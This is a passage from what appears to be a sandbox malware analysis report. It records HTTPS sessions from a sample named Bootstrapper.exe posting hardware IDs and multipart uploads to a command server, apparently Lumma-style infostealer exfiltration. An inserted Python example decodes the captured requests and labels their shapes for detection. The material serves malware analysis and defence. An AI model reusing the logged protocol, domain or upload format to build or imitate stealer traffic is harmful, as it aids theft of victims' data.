                                                    Data Ascii: act=recive_message&ver=4.0&lid=HpOoIh--2a727a032c4d&j=b9abc76ce53b6fc3a03566f8f764f5ea
2025-01-12 06:10:19 UTC | 1121 | IN | HTTP/1.1 200 OK
                                                    Date: Sun, 12 Jan 2025 06:10:19 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Set-Cookie: PHPSESSID=0rqeqb37rvt3dm451j9mhmur31; expires=Wed, 07 May 2025 23:56:58 GMT; Max-Age=9999999; path=/
                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                    Pragma: no-cache
                                                    X-Frame-Options: DENY
                                                    X-Content-Type-Options: nosniff
                                                    X-XSS-Protection: 1; mode=block
                                                    cf-cache-status: DYNAMIC
                                                    vary: accept-encoding
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p55zci0DuXhujkID7rIXErm7XQupwGKKSpRZPkq6pDGvsI9flWs1zXgP%2FbAALg3NwHAySfDfOxKiXcNRyYtdJpJqYNLjXztFStAfhYdAio7nDfjKhYXF2z2YIlQDqyc2wQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 900afb982ba342d8-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1790&min_rtt=1607&rtt_var=734&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2834&recv_bytes=984&delivery_rate=1817050&cwnd=222&unsent_bytes=0&cid=eb859c182477c730&ts=506&x=0"
2025-01-12 06:10:19 UTC | 248 | IN | Data Raw: 34 33 30 63 0d 0a 63 75 6c 52 31 43 49 35 42 2f 54 47 64 4d 37 6f 39 74 67 74 36 73 62 2f 6f 74 58 55 74 67 4a 76 55 67 41 36 41 30 34 4b 45 46 67 4a 79 79 66 32 47 41 30 72 31 72 55 52 37 4e 4b 51 75 55 47 5a 6f 39 4f 41 74 4c 43 55 4f 41 6b 7a 62 45 6c 6d 59 69 68 6d 4e 56 44 54 4e 37 56 4f 53 6d 4c 59 35 42 47 32 79 73 79 44 56 73 69 6a 6b 59 44 76 39 74 4e 6f 44 54 4e 73 57 47 49 6c 5a 57 41 30 45 59 45 39 73 30 70 63 5a 4a 43 6e 47 4b 4f 4e 6b 37 31 4d 67 4b 69 57 7a 37 32 35 6c 43 35 4e 4e 33 6f 59 4f 57 78 48 64 53 77 54 70 44 43 6e 53 52 74 36 32 4c 31 57 71 34 62 55 34 67 2b 4c 6f 35 33 4f 73 37 44 64 61 67 63 36 5a 46 6c 6e 4a 48 70 35 50 68 71 42 4d 37 42 4c 56 6d 32 45 71 68 4b 6b 68 70 57 33 54 4d 6a 71 33 63 65 76 39 6f
                                                    Data Ascii: 430cculR1CI5B/TGdM7o9tgt6sb/otXUtgJvUgA6A04KEFgJyyf2GA0r1rUR7NKQuUGZo9OAtLCUOAkzbElmYihmNVDTN7VOSmLY5BG2ysyDVsijkYDv9tNoDTNsWGIlZWA0EYE9s0pcZJCnGKONk71MgKiWz725lC5NN3oYOWxHdSwTpDCnSRt62L1Wq4bU4g+Lo53Os7Ddagc6ZFlnJHp5PhqBM7BLVm2EqhKkhpW3TMjq3cev9o
2025-01-12 06:10:19 UTC | 1369 | IN | Data Raw: 77 67 58 67 4a 68 53 58 41 35 5a 57 49 38 55 4a 52 39 72 77 42 63 61 64 62 38 56 71 53 47 6d 72 39 4d 68 36 4f 63 77 4b 57 35 31 47 4d 46 4f 47 5a 53 62 69 4e 6e 66 44 41 58 67 7a 71 78 54 31 78 74 6b 4b 73 56 37 4d 54 55 76 56 66 49 2f 4e 33 67 70 37 58 58 64 41 41 68 49 6b 63 76 4e 53 68 31 4e 6c 44 54 63 37 42 4f 57 6d 69 57 74 68 36 6e 67 5a 47 6f 52 49 47 70 6b 4d 43 36 76 4e 74 6a 44 54 64 6f 55 6d 34 6d 62 48 38 33 46 6f 73 7a 39 67 34 62 59 6f 37 6b 54 75 79 70 6b 61 70 49 68 4c 4c 66 2b 76 65 70 6d 6e 6c 4e 4e 32 34 59 4f 57 78 67 64 7a 6b 54 67 44 79 31 53 46 42 33 6c 72 59 51 6f 59 2b 47 76 45 71 47 72 70 37 53 76 62 6a 53 59 77 51 37 61 31 31 6d 4b 43 67 38 65 68 65 54 63 2b 34 41 65 6d 69 64 71 42 79 37 69 74 53 6c 41 5a 48 6b 6d 73 7a 33 37
                                                    Data Ascii: wgXgJhSXA5ZWI8UJR9rwBcadb8VqSGmr9Mh6OcwKW51GMFOGZSbiNnfDAXgzqxT1xtkKsV7MTUvVfI/N3gp7XXdAAhIkcvNSh1NlDTc7BOWmiWth6ngZGoRIGpkMC6vNtjDTdoUm4mbH83Fosz9g4bYo7kTuypkapIhLLf+vepmnlNN24YOWxgdzkTgDy1SFB3lrYQoY+GvEqGrp7SvbjSYwQ7a11mKCg8eheTc+4AemidqBy7itSlAZHkmsz37
2025-01-12 06:10:19 UTC | 1369 | IN | Data Raw: 36 49 68 59 68 4b 33 41 79 59 6c 43 36 4a 4c 30 43 62 6d 61 59 71 68 47 36 79 6f 76 30 56 73 69 6a 6b 59 44 76 39 74 6c 6f 43 44 56 74 57 57 73 69 62 58 67 32 47 49 55 77 70 45 39 66 5a 5a 71 73 48 4b 47 45 6b 4c 4a 47 67 36 2b 62 77 4c 61 38 6c 43 35 4e 4e 33 6f 59 4f 57 78 63 64 54 59 64 68 48 47 44 51 31 56 72 6b 62 4a 57 73 38 53 4e 2b 6b 69 45 35 4d 57 41 75 37 2f 55 61 77 63 30 59 6c 39 73 4b 57 74 31 4f 52 32 4d 4f 62 68 48 58 32 6d 66 71 52 43 73 6a 5a 43 2f 58 59 32 74 6b 63 7a 33 2b 4a 52 6e 46 58 41 36 47 45 34 72 66 6e 45 56 45 35 6f 36 39 6c 38 56 66 4e 61 6a 47 75 7a 53 31 4c 31 4b 67 4b 2b 62 79 4c 65 6b 30 57 34 47 4d 57 68 65 59 43 46 6b 64 44 6f 52 69 7a 57 36 51 46 78 69 68 4c 59 54 71 70 69 65 2b 67 48 49 6f 34 57 41 37 2f 62 69 63 42
                                                    Data Ascii: 6IhYhK3AyYlC6JL0CbmaYqhG6yov0VsijkYDv9tloCDVtWWsibXg2GIUwpE9fZZqsHKGEkLJGg6+bwLa8lC5NN3oYOWxcdTYdhHGDQ1VrkbJWs8SN+kiE5MWAu7/Uawc0Yl9sKWt1OR2MObhHX2mfqRCsjZC/XY2tkcz3+JRnFXA6GE4rfnEVE5o69l8VfNajGuzS1L1KgK+byLek0W4GMWheYCFkdDoRizW6QFxihLYTqpie+gHIo4WA7/bicB
2025-01-12 06:10:19 UTC | 1369 | IN | Data Raw: 62 69 56 6e 65 6a 49 66 68 44 65 34 52 6c 31 6f 6b 36 73 63 76 6f 4b 61 74 30 53 48 72 34 2f 41 75 72 4c 59 5a 41 55 37 61 42 67 76 62 47 39 71 65 6b 6a 4c 42 72 74 50 57 32 61 41 35 41 6e 69 6b 39 53 39 51 38 6a 38 33 63 79 35 74 74 74 73 41 54 74 71 57 57 30 69 62 33 63 7a 47 49 4d 68 74 30 52 54 5a 4a 69 72 46 36 69 50 6b 62 35 49 6a 4b 4b 53 67 50 6e 32 30 33 68 4e 61 43 4a 33 52 68 6b 71 55 77 42 51 6c 48 32 76 41 46 78 70 31 76 78 57 6f 49 6d 59 73 6b 43 4f 72 5a 48 4b 76 72 33 59 61 77 6b 38 61 31 31 6e 4c 57 31 33 4f 78 53 48 4f 62 42 44 57 47 71 5a 71 78 37 73 78 4e 53 39 56 38 6a 38 33 65 57 67 76 64 70 6d 54 53 38 73 51 53 45 72 5a 44 4a 69 55 49 63 36 73 45 5a 65 61 5a 65 69 48 71 6d 43 6b 4c 74 4a 6a 71 65 53 78 4c 4b 33 32 32 51 42 50 6d 68
                                                    Data Ascii: biVnejIfhDe4Rl1ok6scvoKat0SHr4/AurLYZAU7aBgvbG9qekjLBrtPW2aA5Anik9S9Q8j83cy5tttsATtqWW0ib3czGIMht0RTZJirF6iPkb5IjKKSgPn203hNaCJ3RhkqUwBQlH2vAFxp1vxWoImYskCOrZHKvr3Yawk8a11nLW13OxSHObBDWGqZqx7sxNS9V8j83eWgvdpmTS8sQSErZDJiUIc6sEZeaZeiHqmCkLtJjqeSxLK322QBPmh
2025-01-12 06:10:19 UTC | 1369 | IN | Data Raw: 58 6b 6f 46 34 51 33 73 55 78 64 61 70 43 6c 45 36 61 47 6b 37 39 45 68 36 6a 64 6a 76 65 78 7a 43 42 56 63 45 78 54 63 6a 74 72 66 44 45 47 6b 48 4f 70 44 6b 49 6c 6b 61 68 57 39 4d 71 58 73 55 53 4d 70 4a 48 41 73 37 76 55 63 67 49 33 5a 56 46 71 50 6d 4a 31 50 52 75 44 4f 4c 6c 47 53 57 6d 59 74 68 4f 2b 6d 4e 54 30 44 34 2b 38 33 5a 6a 33 67 4e 4e 77 48 54 4d 67 61 58 63 76 66 6e 6b 33 48 4d 73 73 2b 46 6b 62 59 70 72 6b 54 75 79 4d 6d 37 4e 4d 68 36 57 55 7a 4c 71 7a 33 57 55 4d 4e 6d 5a 53 61 79 78 75 64 44 73 56 67 54 43 33 53 6c 4a 69 6e 71 4d 56 76 73 72 61 2b 6b 69 51 35 4d 57 41 6e 72 48 47 62 68 31 77 66 52 5a 34 62 47 39 2b 65 6b 6a 4c 4e 37 78 50 58 32 4b 61 6f 68 4f 71 68 35 57 31 54 6f 69 72 6d 63 75 2b 73 4e 56 74 43 44 31 6d 53 6d 73 6e
                                                    Data Ascii: XkoF4Q3sUxdapClE6aGk79Eh6jdjvexzCBVcExTcjtrfDEGkHOpDkIlkahW9MqXsUSMpJHAs7vUcgI3ZVFqPmJ1PRuDOLlGSWmYthO+mNT0D4+83Zj3gNNwHTMgaXcvfnk3HMss+FkbYprkTuyMm7NMh6WUzLqz3WUMNmZSayxudDsVgTC3SlJinqMVvsra+kiQ5MWAnrHGbh1wfRZ4bG9+ekjLN7xPX2KaohOqh5W1Toirmcu+sNVtCD1mSmsn
2025-01-12 06:10:19 UTC | 1369 | IN | Data Raw: 43 4c 4f 62 4e 4b 56 6d 61 5a 70 77 53 74 6a 49 61 36 51 6f 4b 32 6c 38 75 79 75 39 6c 74 44 6a 5a 6b 55 32 30 2b 59 58 49 35 47 38 74 39 39 6b 64 44 4a 63 37 6b 4e 62 75 63 6e 72 31 44 6e 71 2b 63 77 36 47 37 78 43 42 44 63 48 4e 66 63 47 77 77 5a 43 6f 48 6a 43 7a 34 57 52 74 69 6d 75 52 4f 37 49 79 64 76 45 69 4f 71 6f 2f 46 73 62 6e 62 61 51 51 30 61 6c 74 68 4b 47 78 31 50 78 4f 48 4f 4c 46 44 56 47 47 66 71 68 2b 6a 79 74 72 36 53 4a 44 6b 78 59 43 57 72 64 64 73 41 48 42 39 46 6e 68 73 62 33 35 36 53 4d 73 2f 75 45 56 62 62 35 43 67 45 36 71 41 6b 62 70 45 69 36 75 5a 78 72 4f 35 31 47 73 45 4d 57 52 64 61 79 64 75 66 7a 6b 57 6a 58 50 34 41 46 78 39 31 76 78 57 6a 4a 47 5a 74 6b 6a 49 75 39 50 5a 39 37 48 59 49 46 56 77 61 56 52 6c 4b 32 68 2f 4f
                                                    Data Ascii: CLObNKVmaZpwStjIa6QoK2l8uyu9ltDjZkU20+YXI5G8t99kdDJc7kNbucnr1Dnq+cw6G7xCBDcHNfcGwwZCoHjCz4WRtimuRO7IydvEiOqo/FsbnbaQQ0althKGx1PxOHOLFDVGGfqh+jytr6SJDkxYCWrddsAHB9Fnhsb356SMs/uEVbb5CgE6qAkbpEi6uZxrO51GsEMWRdaydufzkWjXP4AFx91vxWjJGZtkjIu9PZ97HYIFVwaVRlK2h/O
2025-01-12 06:10:19 UTC | 1369 | IN | Data Raw: 78 57 30 70 7a 6d 37 51 52 37 4c 58 61 2b 6c 66 49 2f 4e 33 31 74 4c 6a 61 5a 78 73 68 4c 33 39 33 4a 6d 39 69 50 51 65 45 63 2f 67 41 58 53 58 4f 39 31 6a 73 6a 6f 58 36 46 39 6a 32 78 70 58 6b 34 59 51 79 45 6e 35 37 47 48 64 73 4d 43 42 30 55 4a 6c 7a 37 67 41 63 5a 6f 53 32 45 4b 2b 63 6c 2f 31 78 74 6f 4f 48 7a 62 47 68 78 56 34 7a 4e 33 68 56 5a 7a 74 35 50 69 38 54 68 54 32 78 56 68 73 72 31 71 74 57 39 4c 50 55 38 67 2b 33 36 74 33 59 39 2b 36 55 56 51 34 2b 62 46 39 33 50 53 56 56 49 42 32 4e 4a 4b 63 41 46 53 57 51 35 45 37 38 78 4e 53 2b 58 73 6a 38 7a 5a 4c 73 34 34 63 33 58 57 4a 39 46 6e 68 73 66 6a 4a 69 51 73 56 7a 70 41 41 44 4a 64 47 6e 42 4c 36 4d 6c 36 78 4d 7a 35 71 6a 37 72 43 77 30 57 63 64 63 6b 78 54 64 53 73 6f 50 48 6f 66 79 32
                                                    Data Ascii: xW0pzm7QR7LXa+lfI/N31tLjaZxshL393Jm9iPQeEc/gAXSXO91jsjoX6F9j2xpXk4YQyEn57GHdsMCB0UJlz7gAcZoS2EK+cl/1xtoOHzbGhxV4zN3hVZzt5Pi8ThT2xVhsr1qtW9LPU8g+36t3Y9+6UVQ4+bF93PSVVIB2NJKcAFSWQ5E78xNS+Xsj8zZLs44c3XWJ9FnhsfjJiQsVzpAADJdGnBL6Ml6xMz5qj7rCw0WcdckxTdSsoPHofy2
2025-01-12 06:10:19 UTC | 1369 | IN | Data Raw: 4b 39 61 69 56 76 54 59 32 76 70 4c 6d 65 54 46 6b 4f 58 74 67 54 4e 61 59 44 42 48 4c 7a 55 6f 5a 48 70 49 32 58 33 32 55 68 73 39 31 75 4d 56 76 70 69 53 75 56 6d 4c 34 36 50 2b 6b 4c 6a 54 59 52 73 67 64 56 63 75 41 6c 35 54 42 43 36 65 4d 4c 68 4f 58 48 4f 48 35 46 6a 73 68 64 54 69 64 73 6a 73 33 66 2f 35 39 73 77 67 56 58 42 58 57 32 38 69 62 32 51 72 58 61 77 39 73 55 46 4e 64 59 47 72 57 59 4b 38 74 66 6f 42 79 4b 4c 64 6d 4f 58 34 6c 47 51 63 63 44 6f 49 4d 33 63 39 49 57 31 41 32 53 7a 34 57 52 74 7a 31 76 78 45 34 73 71 47 2b 68 66 49 34 35 37 53 70 62 44 58 64 67 35 33 58 47 5a 47 49 6d 39 7a 4c 41 43 47 50 35 64 44 53 6d 2b 6f 6d 67 4f 76 68 4a 71 39 57 5a 6e 6b 30 34 43 34 39 6f 78 5a 54 58 67 69 5a 79 39 73 63 44 4a 69 55 4c 34 77 75 45 35
                                                    Data Ascii: K9aiVvTY2vpLmeTFkOXtgTNaYDBHLzUoZHpI2X32Uhs91uMVvpiSuVmL46P+kLjTYRsgdVcuAl5TBC6eMLhOXHOH5FjshdTidsjs3f/59swgVXBXW28ib2QrXaw9sUFNdYGrWYK8tfoByKLdmOX4lGQccDoIM3c9IW1A2Sz4WRtz1vxE4sqG+hfI457SpbDXdg53XGZGIm9zLACGP5dDSm+omgOvhJq9WZnk04C49oxZTXgiZy9scDJiUL4wuE5
2025-01-12 06:10:19 UTC | 1369 | IN | Data Raw: 52 57 38 6a 61 71 45 59 70 71 6a 6a 63 50 31 6d 74 4e 74 41 51 35 63 62 33 41 72 65 44 41 63 45 35 30 77 39 67 34 62 66 64 62 38 56 6f 47 59 6b 36 70 4d 79 6f 69 61 7a 62 76 32 79 79 34 55 63 48 51 59 4f 58 38 6d 4d 69 68 51 30 33 50 78 51 30 6c 33 6b 4b 63 41 72 38 32 71 68 47 4b 61 6f 34 33 44 39 59 66 5a 5a 42 73 6c 59 55 68 6d 45 6c 5a 66 4b 42 65 62 4d 50 52 6c 59 53 65 6e 73 68 57 73 68 4a 50 36 41 63 69 38 33 5a 6a 33 6d 38 5a 6e 48 54 4d 67 66 56 74 75 57 57 51 35 45 49 55 30 39 67 34 62 61 64 62 38 56 71 47 59 6b 36 70 4d 78 4b 4f 48 78 2f 65 70 6d 6e 6c 4e 4a 69 49 41 4d 6d 49 6f 59 48 70 49 79 33 53 34 54 56 70 6d 6d 4b 63 45 76 6f 79 58 72 45 7a 50 6d 71 50 76 76 4c 66 45 62 52 77 39 5a 6b 35 66 45 6b 39 30 50 78 65 31 44 59 46 52 58 48 58 55
                                                    Data Ascii: RW8jaqEYpqjjcP1mtNtAQ5cb3AreDAcE50w9g4bfdb8VoGYk6pMyoiazbv2yy4UcHQYOX8mMihQ03PxQ0l3kKcAr82qhGKao43D9YfZZBslYUhmElZfKBebMPRlYSenshWshJP6Aci83Zj3m8ZnHTMgfVtuWWQ5EIU09g4badb8VqGYk6pMxKOHx/epmnlNJiIAMmIoYHpIy3S4TVpmmKcEvoyXrEzPmqPvvLfEbRw9Zk5fEk90Pxe1DYFRXHXU
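
The request bodies captured in this report's HTTP sessions follow a fixed shape: a form-encoded POST /api with act=life, a form-encoded POST /api with act=recive_message plus ver, lid and j, and a multipart POST /api whose first parts are hwid, pid and lid. The Python below is an added example, not part of the Joe Sandbox report and not the sample's own code: it decodes the hex "Data Raw" dumps shown above, de-chunks the server replies (tolerating a capture that stops before the terminating 0-chunk, which is what the report shows for the upload session) and labels each request body with the shape it matches. The labels lumma_life, lumma_recive_message and lumma_multipart_upload are this example's own names; the multipart sample is rebuilt from the visible ASCII prefix of the 12824-byte upload and so carries only the three fields the report displays.

```python
from __future__ import annotations

import re
from urllib.parse import parse_qs

# Inputs copied from the report's "Data Raw" columns (sessions 0, 1 and 2).
LIFE_REQ_HEX = "61 63 74 3d 6c 69 66 65"                    # act=life
LIFE_RESP_HEX = "32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a"       # both reply chunks joined
RECV_REQ_HEX = (
    "61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 "
    "26 6c 69 64 3d 48 70 4f 6f 49 68 2d 2d 32 61 37 32 37 61 30 33 32 63 34 64 26 "
    "6a 3d 62 39 61 62 63 37 36 63 65 35 33 62 36 66 63 33 61 30 33 35 36 36 66 38 "
    "66 37 36 34 66 35 65 61"
)
# Upload reply as shown on the page: one chunk, no terminating 0-chunk captured.
UPLOAD_RESP_HEX = "66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a"
# Upload request rebuilt from the visible ASCII prefix (constructed sample:
# only the three fields the report shows, closed with a final delimiter).
UPLOAD_BOUNDARY = "TB978WPRBRX"
UPLOAD_REQ = (
    b'--TB978WPRBRX\r\nContent-Disposition: form-data; name="hwid"\r\n\r\n'
    b"7AA4328D8341AA22B960CC18D99B375A\r\n"
    b'--TB978WPRBRX\r\nContent-Disposition: form-data; name="pid"\r\n\r\n2\r\n'
    b'--TB978WPRBRX\r\nContent-Disposition: form-data; name="lid"\r\n\r\n'
    b"HpOoIh--2a727a032c4d\r\n--TB978WPRBRX--\r\n"
)


def hex_to_bytes(dump: str) -> bytes:
    """Turn a space-separated hex dump ("61 63 74") into bytes."""
    return bytes.fromhex("".join(dump.split()))


def dechunk(stream: bytes) -> tuple[bytes, bool]:
    """Decode HTTP/1.1 chunked transfer encoding.

    Returns (payload, complete). complete is False when the capture ends before
    the zero-length chunk, so a truncated capture still yields what was seen.
    """
    out = bytearray()
    pos = 0
    while True:
        end = stream.find(b"\r\n", pos)
        if end == -1:
            return bytes(out), False
        size_field = stream[pos:end].split(b";", 1)[0].strip()  # drop chunk extensions
        try:
            size = int(size_field.decode("ascii"), 16)
        except (ValueError, UnicodeDecodeError):
            return bytes(out), False
        if size == 0:
            return bytes(out), True
        start = end + 2
        if len(stream) < start + size + 2:
            out += stream[start:]
            return bytes(out), False
        out += stream[start:start + size]
        pos = start + size + 2  # skip the CRLF that follows the chunk data


def parse_form(body: bytes) -> dict[str, str]:
    """application/x-www-form-urlencoded body -> {key: first value}."""
    pairs = parse_qs(body.decode("latin-1"), keep_blank_values=True)
    return {k: v[0] for k, v in pairs.items()}


def parse_multipart(body: bytes, boundary: str) -> dict[str, bytes]:
    """Minimal multipart/form-data parser: {field name: raw value}."""
    fields: dict[str, bytes] = {}
    for part in body.split(b"--" + boundary.encode())[1:]:
        if part.startswith(b"--"):
            break  # closing delimiter
        head, sep, value = part.partition(b"\r\n\r\n")
        if not sep:
            continue
        m = re.search(rb'name="([^"]*)"', head)
        if m:
            fields[m.group(1).decode()] = value[:-2] if value.endswith(b"\r\n") else value
    return fields


def classify_request(path: str, content_type: str, body: bytes) -> str | None:
    """Label a request with the shape it matches in this report, else None."""
    if path != "/api":
        return None
    if content_type.startswith("application/x-www-form-urlencoded"):
        form = parse_form(body)
        if form.get("act") == "life":
            return "lumma_life"
        if form.get("act") == "recive_message" and {"ver", "lid", "j"}.issubset(form):
            return "lumma_recive_message"
        return None
    if content_type.startswith("multipart/form-data"):
        m = re.search(r"boundary=([^;\s]+)", content_type)
        if m and {"hwid", "pid", "lid"}.issubset(parse_multipart(body, m.group(1))):
            return "lumma_multipart_upload"
    return None


def run() -> dict[str, object]:
    """Drive the helpers over the report's captures and return the findings."""
    form_ct = "application/x-www-form-urlencoded"
    life_reply, life_done = dechunk(hex_to_bytes(LIFE_RESP_HEX))
    upload_reply, upload_done = dechunk(hex_to_bytes(UPLOAD_RESP_HEX))
    return {
        "life": classify_request("/api", form_ct, hex_to_bytes(LIFE_REQ_HEX)),
        "recive_message": classify_request("/api", form_ct, hex_to_bytes(RECV_REQ_HEX)),
        "upload": classify_request("/api", "multipart/form-data; boundary=" + UPLOAD_BOUNDARY, UPLOAD_REQ),
        "lid": parse_form(hex_to_bytes(RECV_REQ_HEX))["lid"],
        "life_reply": life_reply, "life_complete": life_done,
        "upload_reply": upload_reply, "upload_complete": upload_done,
    }


if __name__ == "__main__":
    for key, value in run().items():
        print(f"{key}: {value!r}")
```

Running the file prints the label for each of the three request bodies, the lid value shared by the recive_message and upload requests, the de-chunked "ok" reply to act=life, and the partial "ok 8.46.123.189" reply to the upload together with a flag that the chunk stream was cut off before its terminator.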


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.6 | 49712 | 172.67.219.181 | 443 | 1036 | C:\Users\user\Desktop\Bootstrapper.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-12 06:10:20 UTC | 273 | OUT | POST /api HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Content-Type: multipart/form-data; boundary=TB978WPRBRX
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                    Content-Length: 12824
                                                    Host: jubbenjusk.biz
2025-01-12 06:10:20 UTC | 12824 | OUT | Data Raw: 2d 2d 54 42 39 37 38 57 50 52 42 52 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 41 41 34 33 32 38 44 38 33 34 31 41 41 32 32 42 39 36 30 43 43 31 38 44 39 39 42 33 37 35 41 0d 0a 2d 2d 54 42 39 37 38 57 50 52 42 52 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 54 42 39 37 38 57 50 52 42 52 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 32 61 37 32 37 61 30 33 32 63 34 64 0d 0a 2d 2d 54 42 39 37 38 57 50 52 42 52
                                                    Data Ascii: --TB978WPRBRXContent-Disposition: form-data; name="hwid"7AA4328D8341AA22B960CC18D99B375A--TB978WPRBRXContent-Disposition: form-data; name="pid"2--TB978WPRBRXContent-Disposition: form-data; name="lid"HpOoIh--2a727a032c4d--TB978WPRBR
2025-01-12 06:10:21 UTC | 1132 | IN | HTTP/1.1 200 OK
                                                    Date: Sun, 12 Jan 2025 06:10:21 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Set-Cookie: PHPSESSID=cif5c3hu446ccc2773fbi3nkqs; expires=Wed, 07 May 2025 23:57:00 GMT; Max-Age=9999999; path=/
                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                    Pragma: no-cache
                                                    X-Frame-Options: DENY
                                                    X-Content-Type-Options: nosniff
                                                    X-XSS-Protection: 1; mode=block
                                                    cf-cache-status: DYNAMIC
                                                    vary: accept-encoding
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xGz%2FNZqx2lbZHmmt9LMzpdP3w%2FqP1e6v4qOBss3E9GedkLVzBPBMK%2FdZvJ%2BvL3jIk4fceGGjzcwb%2FGK201q9aI0EXibGcRxQ1nHIQnM9ABVRzLFnn4YKHSEVLpIijzLSOA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 900afba06828236b-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1914&min_rtt=1897&rtt_var=746&sent=8&recv=17&lost=0&retrans=0&sent_bytes=2834&recv_bytes=13755&delivery_rate=1434184&cwnd=172&unsent_bytes=0&cid=c08f2811f06ce788&ts=594&x=0"
                                                    2025-01-12 06:10:21 UTC | 20 | IN | Data Ascii:
                                                    f
                                                    ok 8.46.123.189
                                                    2025-01-12 06:10:21 UTC | 5 | IN | Data Ascii:
                                                    0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    3 | 192.168.2.6 | 49714 | 172.67.219.181 | 443 | 1036 | C:\Users\user\Desktop\Bootstrapper.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2025-01-12 06:10:22 UTC | 271 | OUT | POST /api HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Content-Type: multipart/form-data; boundary=KF9G91EFC
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                    Content-Length: 15058
                                                    Host: jubbenjusk.biz
                                                    2025-01-12 06:10:22 UTC | 15058 | OUT | Data Ascii:
                                                    --KF9G91EFC
                                                    Content-Disposition: form-data; name="hwid"

                                                    7AA4328D8341AA22B960CC18D99B375A
                                                    --KF9G91EFC
                                                    Content-Disposition: form-data; name="pid"

                                                    2
                                                    --KF9G91EFC
                                                    Content-Disposition: form-data; name="lid"

                                                    HpOoIh--2a727a032c4d
                                                    --KF9G91EFC
                                                    Conte
                                                    2025-01-12 06:10:22 UTC | 1136 | IN | HTTP/1.1 200 OK
                                                    Date: Sun, 12 Jan 2025 06:10:22 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Set-Cookie: PHPSESSID=4ahccblrmtbjr1gd98ij4bg0u0; expires=Wed, 07 May 2025 23:57:01 GMT; Max-Age=9999999; path=/
                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                    Pragma: no-cache
                                                    X-Frame-Options: DENY
                                                    X-Content-Type-Options: nosniff
                                                    X-XSS-Protection: 1; mode=block
                                                    cf-cache-status: DYNAMIC
                                                    vary: accept-encoding
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xqBx%2Fe27GCGwleKIaZknbYCsmEWhtusCEm5vba1m%2BDqpkashzxgrJuQAhLHrom2ZrEC%2FNo%2Fc%2Fs%2FQlYQEOOXY2MNGOxBKmcSuao%2BuyhlLMzwkkF4TXe6BE4D85GbfmKDITQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 900afba85d758cca-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1977&min_rtt=1964&rtt_var=763&sent=9&recv=21&lost=0&retrans=0&sent_bytes=2834&recv_bytes=15987&delivery_rate=1409946&cwnd=239&unsent_bytes=0&cid=da20bcf05617d0d6&ts=500&x=0"
                                                    2025-01-12 06:10:22 UTC | 20 | IN | Data Ascii:
                                                    f
                                                    ok 8.46.123.189
                                                    2025-01-12 06:10:22 UTC | 5 | IN | Data Ascii:
                                                    0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    4 | 192.168.2.6 | 49721 | 172.67.219.181 | 443 | 1036 | C:\Users\user\Desktop\Bootstrapper.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2025-01-12 06:10:23 UTC | 271 | OUT | POST /api HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Content-Type: multipart/form-data; boundary=ZSLO3EWW2
